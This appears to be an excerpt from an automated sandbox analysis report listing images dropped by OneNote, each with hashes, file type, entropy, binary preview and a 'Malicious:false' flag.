                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):567
                                                                                                        Entropy (8bit):7.499095532051442
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                        MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                        SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                        SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                        SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):70028
                                                                                                        Entropy (8bit):7.742089280742944
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                        MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                        SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                        SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                        SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1569
                                                                                                        Entropy (8bit):7.583832946136897
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                        MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                        SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                        SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                        SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25622
                                                                                                        Entropy (8bit):7.058784902089801
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                        MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                        SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                        SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                        SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3428
                                                                                                        Entropy (8bit):7.766473352510893
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                        MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                        SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                        SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                        SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
